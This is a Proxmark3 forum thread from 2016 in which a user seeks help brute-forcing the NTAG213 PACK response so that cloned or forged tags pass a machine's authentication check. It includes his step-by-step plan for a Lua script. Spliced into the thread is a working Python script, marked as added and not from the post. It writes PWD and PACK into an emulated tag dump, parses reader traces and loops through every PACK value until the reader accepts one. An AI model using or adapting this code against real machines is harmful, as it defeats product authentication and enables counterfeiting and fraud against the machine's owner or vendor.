Research, development and trades concerning the powerful Proxmark3 device.
I have an NTAG213 tag. For each tag I can listen to the reader and get the key/password for the tag. When the reader gives the key/password to the tag, the tag gives back the PACK. Each tag appears to have a unique PACK, and the check is done internally in the reader/machine. I would like to use blank tags and create new tags that will work in the machine. I plan to get a fresh NTAG213 tag and put it in the machine to get the key/password. I would then like to take the UID and the key/password (and acceptable data on the rest of the tag for proper use) to emulate the tag on the PM3. Where I need help is programming something to take that base data and cycle through all of the values of the PACK. The PACK is a 4-digit hex value, so it may take a while but should not be unreasonable to brute-force the PACK. I could then go back to the original blank tag and copy in the correct data, including the key/password and PACK, to get the tag to work in the machine.
After much work I have got the iceman fork to work in his new docker container. That is where I would hope to add a lua script, or ideally easily be able to branch off of it for this program. I have successfully dumped the contents of a tag to an .eml file using hf mfu dump. I have been successfully fully emulating a tag using the .eml file and hf 14a sim t 7. I have the hf 14a list from both the correct and incorrect PACK being used in the machine, so you can see the difference to start the logic engine. I currently have a logic analyzer connected to the PN512 reader in the machine, so I also have the Saleae Logic files that I can give you of the same thing, showing the communication between the machine and tag, to figure out how to get the logic engine to work. I have the .eml file for the emulation that I can give out.
I have minimal coding experience and feel it would take me a few months to figure out programming and getting this to work correctly, so I'm looking to save myself some time and hassle and would like to find someone who can put this together for me for a reasonable fee in a reasonably quick time frame.
Feel free to ask questions. I have the files referenced above in my Google Drive, so it is easy to e-mail them out if you want to see them to get an idea of what it might take to create the code. Just let me know here if you are interested and how I can get hold of you. I would be willing to share the details of what machine and system the tag is used for once I have someone on board. It is not an access application or anything highly secure.
Am I missing something here? Is this way more complex than I realize? Is there a better way or place to hire someone to help me with my mission with the PM3?
It's not too complex; the thing is how to get feedback to the pm3 client running the lua script that it was successful.
I guess you can send a PACK on a given auth, and see if it sends another command...
Why not figure out if the PACK used is created with an algo and try solving that part?
I've taken the time to try to solve the algo by hand, and when I had no success with that, I moved on to CRC RevEng. I'm fairly confident it is a CRC, but I run into the issue that there are too many options and variables. I don't know what the original input is: the UID, the key, or a combination of both. What order any of the previous things are used in the input. Left-to-right input, right-to-left bit reads. I don't have a guess at an initial value, an XOR on the input, or an XOR on the output. And with a simple salt of unknown length on the UID I have no chance ever of getting to the end of the algorithm. I made standard guesses and got absolutely nowhere. That is what has gotten me to this point of wanting to brute-force the PACK. My plan is to use the attack to get some simplified inputs, like a UID of 0000000000000, and see if I can gain any data on the algo. If anyone has advice on a better way to look into the algorithm, I'm game.
When a correct PACK is given to the machine/reader, right after the tag gives the PACK the reader asks to read the next block. If the PACK is incorrect, the reader stops, then sends anticollision data and restarts later. So the logic point is basically: after the tag has sent the PACK, if the reader responds with read block 8 it worked; if not, take the next PACK and start again.
Not knowing exactly how the lua scripting works, my base plan was to basically use the Lua script as a macro over the pm3 program. The basic outline is below:
Have inputs of the "UID" of the Tag and the "Key" and a "Timing Space"
1. hf mf eload the base .eml file in the PM3 memory
2. hf mf eset the input "UID" "Key" and initial "PACK"
3. hf 14a sim t7
4. wait for read using "Timing Space" and then stop sim
5. hf list to file or to variable
6. Find "PACK" in file/variable
7. Look through the next X number of characters for "30 08" (the read next block command)
8. if found output PACK
9. if not found hf mf eset next PACK attempt
10. Repeat from Step 3.
And rather than learning C, learning Lua scripting, and figuring out coding for the PM3 from scratch, I would like to hire a partner who has experience with those things to assist with the coding.
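The decision logic of the ten-step outline above, as an added example (not code from the forum post or from the Proxmark3 project): write a candidate PACK into the emulated NTAG213 dump, run one reader interaction, and decide from the trace whether the reader followed the tag's PACK reply with READ block 8 ("30 08"). Assumptions not stated on the page: the trace format used here ("Rdr:"/"Tag:" plus hex bytes) is a constructed, simplified one, not the real `hf 14a list` output, which a Lua script would have to parse instead; the `probe` callback stands in for the Proxmark3 commands (hf mf eset / hf 14a sim / hf list) that the script would drive; the constructed password and PACK are placeholders. The NTAG213 page layout (PWD in page 0x2B, PACK in bytes 0-1 of page 0x2C, 45 pages) and the ISO 14443-3 Type A CRC are from the public specifications.

```python
# Added example: PACK brute-force decision logic for an emulated NTAG213.
# Not from the forum post or the Proxmark3 project; see assumptions in the lead-in.

from typing import Callable, Optional

PWD_AUTH = 0x1B        # NTAG21x PWD_AUTH command byte
READ = 0x30            # READ command byte (4 pages from the given address)
WUPA = 0x52            # short frame, no CRC: reader restarting anticollision
PAGE_PWD, PAGE_PACK, NTAG213_PAGES = 0x2B, 0x2C, 45


def crc_a(data: bytes) -> bytes:
    """ISO 14443-3 Type A CRC: init 0x6363, reflected poly 0x8408, sent LSB first."""
    crc = 0x6363
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return bytes([crc & 0xFF, crc >> 8])


def with_crc(payload: bytes) -> bytes:
    return payload + crc_a(payload)


def crc_ok(frame: bytes) -> bool:
    return len(frame) >= 3 and crc_a(frame[:-2]) == frame[-2:]


def parse_trace(text: str) -> list:
    """Parse constructed 'Rdr: 1b de ad ..' / 'Tag: ..' lines into (side, bytes)."""
    frames = []
    for line in text.strip().splitlines():
        side, _, hexpart = line.partition(":")
        frames.append((side.strip(), bytes.fromhex(hexpart)))
    return frames


def pack_accepted(frames: list, pwd: bytes) -> Optional[bool]:
    """Steps 6-8: find PWD_AUTH with our password, skip the tag's 4-byte PACK+CRC
    reply, and check whether the reader's next frame is READ page 8.
    Returns None if no such PWD_AUTH is in the trace (the sim never got that far)."""
    for i, (side, data) in enumerate(frames):
        if side != "Rdr" or data[:1] != bytes([PWD_AUTH]) or data[1:5] != pwd or not crc_ok(data):
            continue
        if i + 2 >= len(frames) or frames[i + 1][0] != "Tag" or len(frames[i + 1][1]) != 4:
            return False   # reader stopped (or tag reply malformed) right after auth
        side2, nxt = frames[i + 2]
        return side2 == "Rdr" and nxt[:2] == bytes([READ, 0x08]) and crc_ok(nxt)
    return None


def eml_set_pwd_pack(eml_lines: list, pwd: bytes, pack: int) -> list:
    """Steps 2/9: put PWD into page 0x2B and PACK into page 0x2C (PACK0, PACK1, then
    two RFUI bytes) of a dump held as one 8-hex-digit page per line, as in an .eml."""
    if len(eml_lines) != NTAG213_PAGES:
        raise ValueError("expected a 45-page NTAG213 dump")
    lines = list(eml_lines)
    lines[PAGE_PWD] = pwd.hex().upper()
    lines[PAGE_PACK] = pack.to_bytes(2, "big").hex().upper() + "0000"
    return lines


def brute_force_pack(probe: Callable[[int], str], pwd: bytes,
                     start: int = 0x0000) -> Optional[int]:
    """Steps 3-10: for each candidate PACK run one interaction via probe() and
    decide from the returned trace; the first accepted PACK is returned."""
    for pack in range(start, 0x10000):
        if pack_accepted(parse_trace(probe(pack)), pwd):
            return pack
    return None


# Constructed reader model so the loop runs offline (real runs read `hf list`).
def fake_reader(secret_pack: int, pwd: bytes) -> Callable[[int], str]:
    """Behaves as the post describes: READ page 8 after the right PACK, else a
    WUPA restart."""
    def probe(candidate: int) -> str:
        auth = with_crc(bytes([PWD_AUTH]) + pwd).hex()
        reply = with_crc(candidate.to_bytes(2, "big")).hex()
        nxt = with_crc(bytes([READ, 0x08])).hex() if candidate == secret_pack else f"{WUPA:02x}"
        return f"Rdr: {auth}\nTag: {reply}\nRdr: {nxt}\n"
    return probe


if __name__ == "__main__":
    pwd = bytes.fromhex("DEADBEEF")            # constructed placeholder, not a real key
    found = brute_force_pack(fake_reader(0x8080, pwd), pwd, start=0x8000)
    print(f"PACK found: {found:04X}")          # prints 8080
    dump = eml_set_pwd_pack(["00000000"] * NTAG213_PAGES, pwd, found)
    print(dump[PAGE_PWD], dump[PAGE_PACK])     # DEADBEEF 80800000
```

The CRC check on the PWD_AUTH and READ frames is what separates a real reader command from noise or a truncated capture, and the None return distinguishes "the reader never authenticated" (a timing problem with the sim window) from "the reader rejected this PACK", which is the case worth watching for when the loop silently walks past the right value.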
Message Removed.
Last edited by greatone76 (2016-06-16 04:28:39)
I think you misunderstand what motivates people here; a lot of them, me included, have daytime jobs that pay well in the software business. I can only speak for myself, but I do things that I find fun and that interest me. Others might be interested if there is new functionality that will increase their business potential within RFID security.
I'm not here for the money, well, six figures and we can speak about it.